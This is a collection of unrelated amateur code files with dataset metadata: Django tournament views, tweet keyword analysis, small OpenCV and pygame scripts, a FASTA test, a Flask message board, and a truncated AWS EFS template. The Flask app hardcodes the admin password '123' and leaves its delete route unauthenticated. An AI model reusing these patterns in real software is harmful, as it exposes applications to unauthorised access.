'POST':\n if thash:\n form = TournamentForm(request.POST, instance=tourn)\n else:\n form = TournamentForm(request.POST)\n\n if form.is_valid():\n tourn = form.save(commit=False)\n tourn.owner = request.user\n tourn.save()\n return HttpResponseRedirect(reverse('tourn_item', args=(tourn.thash, )))\n\n return render(request, 'tournaments/add.html', {\n 'form': form, 'tourn': tourn\n })\n\n\ndef tournament_item(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n ttypes = []\n sports = []\n for t in TOURNAMENT_TYPES:\n ttypes.append('{value: %s, text: \"%s\"}' % (t[0], t[1]))\n for s in Sport.objects.all():\n sports.append('{value: %s, text: \"%s\"}' % (s.id, s.name))\n return render_to_response(\n 'tournaments/tournament.html',\n dict(tourn=tourn, parts=tourn.tournamentparticipant_set.order_by('order').all(), ttypes=', '.join(ttypes), sports=', '.join(sports)),\n context_instance=RequestContext(request)\n )\n\n\ndef tournament_list(request):\n tourns = Tournament.objects.all()\n return render_to_response('tournaments/list.html', {'tourns': tourns}, context_instance=RequestContext(request))\n\n\ndef tournament_participants(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n\n if request.is_ajax():\n part_form = ParticipantForm(request.POST)\n if part_form.is_valid():\n tp = TournamentParticipant()\n tp.tournament = tourn\n # p = Participant.create(part_form.cleaned_data['name']).save()\n p = Participant()\n p.name = part_form.cleaned_data['name']\n p.save()\n tp.participant = p\n max_order = tourn.tournamentparticipant_set.aggregate(Max('order'))\n tp.order = max_order['order__max'] + 1 if max_order['order__max'] else 0\n tp.save()\n return HttpResponse(json.dumps({\n 'status': 'success',\n 'html': loader.get_template('tournaments/participant.html').render(Context({'part': tp}))\n }))\n else:\n return HttpResponse(json.dumps({'status': 'error', 'errors': part_form.errors}))\n\n part_form = ParticipantForm()\n empty_part = tourn.npart - tourn.tournamentparticipant_set.order_by('order').all().count()\n return render_to_response(\n 
'tournaments/participants.html',\n {\n 'tourn': tourn,\n 'part_form': part_form,\n 'parts': tourn.tournamentparticipant_set.order_by('order').all(),\n 'empty_part': empty_part\n },\n context_instance=RequestContext(request)\n )\n\n\n@require_POST\n@ajax_required\ndef part_save_order(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n # check ownership\n if request.user.id != tourn.owner_id:\n raise HttpResponseForbidden\n\n # get order from request\n order = request.POST['order'] if 'order' in request.POST else None\n if order:\n oo = order.split(',')\n # set order for participants\n for i in range(len(oo)):\n try:\n part = TournamentParticipant.objects.get(pk=oo[i])\n part.order = i\n part.save()\n except: #DoesNotExist\n pass\n\n return HttpResponse(json.dumps({\n 'status': 'success',\n 'html': 'Order saved: %s' % order\n }))\n else:\n return HttpResponse(json.dumps({'status': 'error'}))\n\n\n@require_POST\n@ajax_required\ndef part_delete(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n # check ownership\n if request.user.id != tourn.owner_id:\n raise HttpResponseForbidden\n\n # get part_id from request\n part_id = request.POST['part_id'] if 'part_id' in request.POST else None\n if part_id:\n part = TournamentParticipant.objects.get(pk=part_id)\n if not part:\n return HttpResponseNotFound\n if part.tournament_id != tourn.id:\n return HttpResponseForbidden\n part.delete()\n\n return HttpResponse(json.dumps({\n 'status': 'success',\n 'html': 'Participant deleted, id was: %d' % int(part_id)\n }))\n else:\n return HttpResponse(json.dumps({'status': 'error'}))\n\n\nclass Cell:\n empty = True\n part1 = ''\n part2 = ''\n css = ''\n txt = ''\n ctype = ''\n style = ''\n\n def __init__(self, txt='', css='', ctype='', style=''):\n self.css = css\n self.txt = txt\n self.ctype = ctype\n self.style = style\n\n def empty(self):\n return not (self.css or self.txt or self.part1 or self.part2)\n\n def __unicode__(self):\n if self.part1 or self.part2:\n if self.part1 and self.part2:\n return _(\"%(part_1)s vs. %(part_2)s\") % (self.part1, self.part2)\n else:\n return _(u\"%s vs. 
пусто\") % (self.part1 if self.part1 else self.part2)\n else:\n return self.txt\n\n\ndef grid_gen(num, names=[]):\n names = deque(names)\n rounds = int(math.ceil(math.log(num, 2)))\n num2 = int(math.pow(2, rounds))\n width = 2 * rounds - 1\n height = num2 - 1\n grid = []\n a = (u'├', u'┘', u'┐', u'│')\n for y in range(height):\n grid.append(range(y * width + 1, width + y * width + 1))\n\n for y in range(num2 - 1):\n # this one piece of code set participant numbers like (1, 2) or (16, 32)\n if y % 2 == 0:\n c = Cell(ctype='part')\n # if y + 1 <= num:\n c.part1 = names.popleft() if names.__len__() > 0 else 'пусто' #;partn +=1 # y + 1\n # if y + 2 <= num:\n c.part2 = names.popleft() if names.__len__() > 0 else 'пусто' # partn;partn +=1 # y + 2\n # first column\n # print c.part1.participant.name if isinstance(c.part1, TournamentParticipant) else 'no' #, c.part2.participant.name, c.part1.participant_id, c.part2.participant_id\n grid[y][0] = c\n # grid[y][0] = y + 1 if y + 1 <= num else None, y + 2 if y + 2 <= num else Cell()\n for r in range(2, width, 2):\n grid[y][r] = Cell() #empty\n else:\n for r in range(0, width, 2):\n i = r / 2\n if y % math.pow(2, i + 1) == (math.pow(2, i) - 1):\n c = Cell(ctype='part')\n c.part1 = y + 1\n c.part2 = int(y + math.pow(2, i) + 1)\n # other columns\n grid[y][r] = c\n else:\n grid[y][r] = Cell()\n # grid[y][r] = (y + 1, int(y + math.pow(2, i) + 1)) if y % math.pow(2, i + 1) == (math.pow(2, i) - 1) else Cell()\n\n # this one places fork like a letter T on the left side\n for r in range(1, width, 2):\n i = (r + 1) / 2\n grid[y][r] = Cell(a[0], 'color: red;') if (y % math.pow(2, i + 1) == math.pow(2, i) - 1) else Cell()\n\n # this one places upper or down corner\n for r in range(1, width, 2):\n i = (r - 1) / 2\n if y % math.pow(2, i + 1) == math.pow(2, i) - 1:\n grid[y][r] = Cell(a[2], 'color: red;') if (y % math.pow(2, i + 2) == math.pow(2, i) - 1) else Cell(a[1], 'color: red;')\n\n # this piece of code creates part of arrows |\n for r in range(3, width, 2):\n i = (r - 1) / 2\n if y % math.pow(2, i + 2) != (math.pow(2, i + 1) - 1) and (math.pow(2, i) - 1) < y % math.pow(2, i + 2) < (math.pow(2, i + 2) - math.pow(2, i) - 1):\n grid[y][r] = Cell(a[3], 'color: red;')\n return grid, width\n\n\ndef tournament_template(request, *args):\n num = int(args[0]) if len(args) == 1 else 8\n if num < 3:\n raise Http404\n # number of players\n grid, width = grid_gen(num)\n\n return render_to_response('tournaments/standing.html', {'width': width, 'grid': grid}, context_instance=RequestContext(request))\n\n\ndef information(request, thash=None):\n tourn = get_object_or_404(Tournament, thash=thash)\n return render_to_response(\"tournaments/info.html\", locals(), RequestContext(request))\n\n\ndef results(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n parts = tourn.tournamentparticipant_set.order_by('order').all()\n names = []\n\n for p in parts:\n names.append(p)\n grid, width = grid_gen(tourn.npart + 1, names)\n\n parts_js = []\n for p in parts: #tourn.tournamentparticipant_set.order_by('participant__name').all():\n parts_js.append('{value: %s, text: \"%s\"}' % (p.id, p.participant.name))\n parts_js=', '.join(parts_js)\n\n return render_to_response(\"tournaments/standing2.html\", locals(), RequestContext(request))\n\n\ndef profile(request):\n return None", "sub_path": "kickme/tournament/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 12175, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", 
"pt": "32", "api": [{"api_name": "django.http.HttpResponseBadRequest", "line_number": 38, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 51, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 68, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 68, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 72, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 72, "usage_type": "call"}, {"api_name": "social_auth.db.django_models", "line_number": 77, "usage_type": "name"}, {"api_name": "social_auth.db.django_models.UserSocialAuth.get_social_auth_for_user", "line_number": 77, "usage_type": "call"}, {"api_name": "social_auth.db.django_models.UserSocialAuth", "line_number": 77, "usage_type": "name"}, {"api_name": "social_auth.db.django_models", "line_number": 78, "usage_type": "name"}, {"api_name": "social_auth.db.django_models", "line_number": 86, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 95, "usage_type": "call"}, {"api_name": "social_auth.db.django_models", "line_number": 98, "usage_type": "name"}, {"api_name": "django.template.context.RequestContext", "line_number": 102, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 75, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 110, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 125, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 106, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 133, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 140, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 143, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 149, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 149, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 153, "usage_type": "call"}, {"api_name": "django.db.models.Max", "line_number": 165, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 168, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 168, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 170, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 170, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 170, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 173, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 173, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 177, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 185, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", 
"line_number": 192, "usage_type": "call"}, {"api_name": "django.http.HttpResponseForbidden", "line_number": 195, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 210, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 210, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 215, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 215, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 189, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 221, "usage_type": "call"}, {"api_name": "django.http.HttpResponseForbidden", "line_number": 224, "usage_type": "name"}, {"api_name": "django.http.HttpResponseNotFound", "line_number": 231, "usage_type": "name"}, {"api_name": "django.http.HttpResponseForbidden", "line_number": 233, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 236, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 236, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 241, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 241, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 218, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 265, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 267, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 273, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 274, "usage_type": "call"}, {"api_name": "math.log", "line_number": 274, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 275, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 300, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 303, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 313, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 318, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 319, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 324, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 332, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 336, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 336, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 340, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 341, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 341, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 345, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 358, "usage_type": "call"}, {"api_name": "django.template.context.RequestContext", "line_number": 358, "usage_type": "call"}]} +{"seq_id": "347656205", "text": "import json\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport re\n\ntweets_data_path = '1_18.txt'\ntweets_data = []\ntweets_file = open(tweets_data_path, \"r\")\n\nfor line in tweets_file:\n try:\n tweet = json.loads(line)\n tweets_data.append(tweet)\n except:\n continue\n\ntweets = pd.DataFrame()\ntweets['text'] = [tweet.get('text','') for tweet in tweets_data]\ntweets['lang'] = [tweet.get('lang','') for tweet in tweets_data]\n#for i in 
tweets['text']:\n#if tweet['place'] == None:\n # tweets['country'] = None\n#else:\n # tweets['country'] = [tweet['place'].get('country', '') for tweet in tweets_data]\n#else: None\n #else:\n # tweets['country'][i]= [tweet['place'][i].get('country', '') for tweet in tweets_data]\ntweets['time'] = [tweet.get('created_at','') for tweet in tweets_data]\n#tweets['user'] = [tweet.get('screen_name', '') for tweet in tweets_data]\n#tweets['user_id'] = [tweet.get('id', '') for tweet in tweets_data]\n#tweets['user_followers'] = [tweet.get('followers_count', '') for tweet in tweets_data]\n\n#print tweets['lang'].value_counts()\n\n\n# fig, ax = plt.subplots()\n# ax.tick_params(axis='x', labelsize=15)\n# ax.tick_params(axis='y', labelsize=10)\n# ax.set_xlabel('Languages', fontsize=15)\n# ax.set_ylabel('Number of tweets' , fontsize=15)\n# ax.set_title('Top 5 languages', fontsize=15, fontweight='bold')\n# tweets_by_lang[:5].plot(ax=ax, kind='bar', color='red')\n# plt.show()\n\ndef word_in_text(word, text):\n word = word.lower()\n text = text.lower()\n match = re.search(word, text)\n if match:\n return True\n return False\n\n\ntweets['corn'] = tweets['text'].apply(lambda tweet: word_in_text('corn', tweet))\ntweets['soybean'] = tweets['text'].apply(lambda tweet: word_in_text('soybean', tweet))\ntweets['wheat'] = tweets['text'].apply(lambda tweet: word_in_text('wheat', tweet))\n\n#print tweets['corn'].value_counts()[True]\n#print tweets['soybean'].value_counts()[True]\n#print tweets['wheat'].value_counts()[True]\n\ndef extract_link(text):\n regex = r'https?://[^\\s<>\"]+|www\\.[^\\s<>\"]+'\n match = re.search(regex, text)\n if match:\n return match.group()\n return ''\n\n\ntweets['link'] = tweets['text'].apply(lambda tweet: extract_link(tweet))\n\ntweets_soybean = tweets[tweets['soybean'] == True]\ntweets_soybean_with_link = tweets_soybean[tweets_soybean['link'] != '']\ntweets_corn = tweets[tweets['corn'] == True]\ntweets_corn_with_link = tweets_corn[tweets_corn['link'] != '']\ntweets_wheat = tweets[tweets['wheat'] == True]\ntweets_wheat_with_link = tweets_wheat[tweets_wheat['link'] != '']\n\ntweets_with_link = {'soybean': tweets_soybean_with_link,\n 'corn': tweets_corn_with_link,\n 'wheat': tweets_wheat_with_link}\n\n#print tweets_with_link['corn'][-5:]['link']\n\n#tweets.to_pickle('tweets.txt')\n#tweets.to_excel('path_to_file.xlsx', sheet_name='Sheet1')\n\n#from pandas import ExcelWriter\n#writer = ExcelWriter('output.xlsx')\n#tweets.to_excel(writer,'Sheet1')\n#df2.to_excel(writer,'Sheet2')\n#writer.save()\n\n", "sub_path": "granstweets4.py", "file_name": "granstweets4.py", "file_ext": "py", "file_size_in_byte": 3012, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.loads", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 17, "usage_type": "call"}, {"api_name": "re.search", "line_number": 48, "usage_type": "call"}, {"api_name": "re.search", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "104589461", "text": "import numpy as np \r\nimport cv2\r\n\r\n#Displaying a circle.\r\npic=np.zeros((500,500,3),dtype='uint8')\r\ncolor=(255,0,255)\r\ncv2.circle(pic,(250,250),50,color)\r\ncv2.imshow('dark',pic)\r\ncv2.waitKey(5000)\r\ncv2.destroyAllWindows()\r\n", "sub_path": "circle.py", "file_name": "circle.py", "file_ext": "py", "file_size_in_byte": 222, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.zeros", 
"line_number": 5, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "431145463", "text": "import pygame\nfrom random import randint\nimport misc\n\n# List of the [x, y] coordinates of existing holes\nhole_locations = []\n\n\nclass Hole(pygame.sprite.Sprite):\n \"\"\"\n Holes: The ants portal to the underworld\n \"\"\"\n def __init__(self, at_mouse=False):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"images/hole01a.png\")\n self.rect = self.image.get_rect()\n if at_mouse: # Add hole at mouse location\n pos = misc.get_mouse_loc()\n # Set new top left coordinates\n self.rect.x, self.rect.y = pos[0] - 30, pos[1] - 30\n else:\n self.rect.x, self.rect.y = get_valid_hole_location()\n global hole_locations\n # Add new coordinates to list\n hole_locations.append([self.rect.x, self.rect.y])\n\n\ndef get_valid_hole_location():\n \"\"\"\n Run through hole_locations in search for a new valid hole location\n :return: The valid x and y coordinates\n \"\"\"\n valid_location = False # First assume the location is not valid\n x = 0\n y = 0\n\n while not valid_location: # Loop while coordinates not valid\n # Count to check the new hole is valid for all existing holes\n valid_count = 0\n x = randint(1, 838) # Generate random x\n y = randint(1, 538) # And random y\n for hole_loc in hole_locations: # For each hole\n # If new hole is to the left of, or above the existing hole\n if x < hole_loc[0] - 61 or y < hole_loc[1] - 61:\n valid_count += 1\n # Else if new hole doesn't overlap existing hole\n elif not (x < hole_loc[0] + 61 and y < hole_loc[1] + 61):\n valid_count += 1\n # If coordinates are valid for every existing hole\n if valid_count == len(hole_locations):\n valid_location = True\n return x, y # Return coordinates x and y\n", "sub_path": "ants/classes/hole_class.py", "file_name": "hole_class.py", "file_ext": "py", "file_size_in_byte": 1890, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.sprite", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 15, "usage_type": "attribute"}, {"api_name": "misc.get_mouse_loc", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 40, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "318100191", "text": "#!/usr/bin/env python\n# coding=utf-8\n\nimport io\nimport unittest\n\nfrom src.fasta_reader import FastaReader\n\n\nclass TestFastaReader(unittest.TestCase):\n def setUp(self):\n self.reader = FastaReader()\n\n def test_read(self):\n no_line_breaks = io.BytesIO('>seq_1\\nGATTACAGATTACAGATTACAGATTACAGATTACAGATTACAGATTACAGATTACA\\n' +\n '>seq_2\\nNNNNNNNNGATTACAGATTACAGATTACANNNNNNNNNNN')\n line_breaks = io.BytesIO('>seq_1\\nGATTACAGATTACAGATTACAGATTACA\\nGATTACAGATTACAGATTACAGATTACA\\n' +\n '>seq_2\\nNNNNNNNNGATTACAGATTACAGATTAC\\nANNNNNNNNNNN')\n\n self.reader.read(no_line_breaks)\n self.assertEquals(2, len(self.reader.seqs))\n 
self.assertEquals('seq_1', self.reader.seqs[0].header)\n self.assertEquals('GATTACAGATTACAGATTACAGATTACAGATTACAGATTACAGATTACAGATTACA', self.reader.seqs[0].bases)\n self.assertEquals('seq_2', self.reader.seqs[1].header)\n self.assertEquals('NNNNNNNNGATTACAGATTACAGATTACANNNNNNNNNNN', self.reader.seqs[1].bases)\n self.reader.read(line_breaks)\n self.assertEquals(4, len(self.reader.seqs))\n self.assertEquals('NNNNNNNNGATTACAGATTACAGATTACANNNNNNNNNNN', self.reader.seqs[3].bases)\n\n\ndef suite():\n _suite = unittest.TestSuite()\n _suite.addTest(unittest.makeSuite(TestFastaReader))\n return _suite\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "test/fasta_reader_tests.py", "file_name": "fasta_reader_tests.py", "file_ext": "py", "file_size_in_byte": 1410, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "src.fasta_reader.FastaReader", "line_number": 12, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 15, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 17, "usage_type": "call"}, {"api_name": "unittest.TestSuite", "line_number": 32, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 33, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "440569322", "text": "import json\nfrom functools import wraps\nfrom flask import Flask, redirect, url_for, request, jsonify, render_template, session\nfrom models import * \nfrom app import *\n\ndef login_required(f):\n\t@wraps(f)\n\tdef wrap(*args, **kwargs):\n\t\tif 'is_admin' in session:\n\t\t\treturn f(*args, **kwargs)\n\t\telse:\n\t\t\treturn redirect(url_for('login'))\n\treturn wrap\n\n@app.route('/admin')\n@login_required\ndef admin():\n\ttab = 'admin'\n\treturn render_template('admin.html')\n\n@app.route('/messages')\ndef send_data():\n\tdata = get_msgs()\n\treturn json.dumps(data)\n\n@app.route('/addMsg', methods = [ 'POST'])\ndef addMsg():\n\t\n\tif request.method=='POST':\n\t\tif request.form['msg']!='':\n\t\t\tmsg = request.form['msg']\n\t\t\tinsert_msg(msg)\n\n\tlists = get_msgs()\n\treturn json.dumps(lists)\n\n\n@app.route(\"/\",methods = ['GET', 'POST'])\ndef home():\n\ttab = 'home'\n\treturn render_template(\"home.html\")\n\n@app.route('/about')\ndef about():\n\treturn render_template('about.html')\n\n\n@app.route('/delete/<int:id>')\ndef delete_message(id):\n\t\n\tif request.method=='GET':\n\t\tdelete_msg(id)\n\n\tdata1 = get_msgs()\n\treturn json.dumps(data1)\n\n@app.route(\"/login\", methods=['GET','POST'])\ndef login():\n\terror=None\n\tif request.method=='POST':\n\t\tif request.form['username']!='admin' or request.form['pwd']!='123':\n\t\t\terror='Invalid credentials. 
Please try again!'\n\t\telse:\n\t\t\tsession['is_admin'] = True \n\t\t\treturn redirect(url_for('admin'))\n\treturn render_template(\"login.html\", error=error)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n\tsession.pop('is_admin', None)\n\treturn redirect(url_for('home'))", "sub_path": "views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.session", "line_number": 9, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "app.route", "line_number": 15, "usage_type": "call"}, {"api_name": "app.route", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "app.route", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}, {"api_name": "app.route", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "app.route", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "app.route", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "app.route", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 73, "usage_type": "call"}, {"api_name": "app.route", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "494596517", "text": "import argparse\nfrom troposphere import And, Condition, Equals, If, Not, NoValue, Output, Parameter, Ref, Select, Template\nfrom troposphere.efs import FileSystem, MountTarget\n\n\ndef main(args):\n t = Template()\n\n # [0 shared_dir, 1 efs_fs_id, 2 performance_mode, 3 efs_kms_key_id,\n # 4 provisioned_throughput, 5 encrypted, 6 throughput_mode, 7 exists_valid_head_node_mt, 8 exists_valid_compute_mt]\n efs_options = t.add_parameter(\n Parameter(\n \"EFSOptions\",\n Type=\"CommaDelimitedList\",\n 
Description=\"Comma separated list of efs related options, 9 parameters in total\",\n )\n )\n compute_security_group = t.add_parameter(\n Parameter(\"ComputeSecurityGroup\", Type=\"String\", Description=\"Security Group for Mount Target\")\n )\n head_node_subnet_id = t.add_parameter(\n Parameter(\"MasterSubnetId\", Type=\"String\", Description=\"Head node subnet id for head node mount target\")\n )\n compute_subnet_id = t.add_parameter(\n Parameter(\n \"ComputeSubnetId\",\n Type=\"String\",\n Description=\"User provided compute subnet id. Will be use to create compute mount target if needed.\",\n )\n )\n\n create_efs = t.add_condition(\n \"CreateEFS\",\n And(Not(Equals(Select(str(0), Ref(efs_options)), \"NONE\")), Equals(Select(str(1), Ref(efs_options)), \"NONE\")),\n )\n create_head_node_mt = t.add_condition(\n \"CreateMasterMT\",\n And(Not(Equals(Select(str(0), Ref(efs_options)), \"NONE\")), Equals(Select(str(7), Ref(efs_options)), \"NONE\")),\n )\n no_mt_in_compute_az = t.add_condition(\"NoMTInComputeAZ\", Equals(Select(str(8), Ref(efs_options)), \"NONE\"))\n use_user_provided_compute_subnet = t.add_condition(\n \"UseUserProvidedComputeSubnet\", Not(Equals(Ref(compute_subnet_id), \"NONE\"))\n )\n # Need to create compute mount target if:\n # user is providing a compute subnet and\n # there is no existing MT in compute subnet's AZ(includes case where head node AZ == compute AZ).\n #\n # If user is not providing a compute subnet, either we are using the head node subnet as compute subnet,\n # or we will be creating a compute subnet that is in the same AZ as head node subnet,\n # see ComputeSubnet resource in the main stack.\n # In both cases no compute MT is needed.\n create_compute_mt = t.add_condition(\n \"CreateComputeMT\", And(Condition(use_user_provided_compute_subnet), Condition(no_mt_in_compute_az))\n )\n\n use_performance_mode = t.add_condition(\"UsePerformanceMode\", Not(Equals(Select(str(2), Ref(efs_options)), \"NONE\")))\n use_efs_encryption = t.add_condition(\"UseEFSEncryption\", Equals(Select(str(5), Ref(efs_options)), \"true\"))\n use_efs_kms_key = t.add_condition(\n \"UseEFSKMSKey\", And(Condition(use_efs_encryption), Not(Equals(Select(str(3), Ref(efs_options)), \"NONE\")))\n )\n use_throughput_mode = t.add_condition(\"UseThroughputMode\", Not(Equals(Select(str(6), Ref(efs_options)), \"NONE\")))\n use_provisioned = t.add_condition(\"UseProvisioned\", Equals(Select(str(6), Ref(efs_options)), \"provisioned\"))\n use_provisioned_throughput = t.add_condition(\n \"UseProvisionedThroughput\",\n And(Condition(use_provisioned), Not(Equals(Select(str(4), Ref(efs_options)), \"NONE\"))),\n )\n\n fs = t.add_resource(\n FileSystem(\n \"EFSFS\",\n PerformanceMode=If(use_performance_mode, Select(str(2), Ref(efs_options)), NoValue),\n ProvisionedThroughputInMibps=If(use_provisioned_throughput, Select(str(4), Ref(efs_options)), NoValue),\n ThroughputMode=If(use_throughput_mode, Select(str(6), Ref(efs_options)), NoValue),\n Encrypted=If(use_efs_encryption, Select(str(5), Ref(efs_options)), NoValue),\n KmsKeyId=If(use_efs_kms_key, Select(str(3), Ref(efs_options)), NoValue),\n Condition=create_efs,\n )\n )\n\n t.add_resource(\n MountTarget(\n \"MasterSubnetEFSMT\",\n FileSystemId=If(create_efs, Ref(fs), Select(str(1), Ref(efs_options))),\n SecurityGroups=[Ref(compute_security_group)],\n SubnetId=Ref(head_node_subnet_id),\n Condition=create_head_node_mt,\n )\n )\n\n t.add_resource(\n 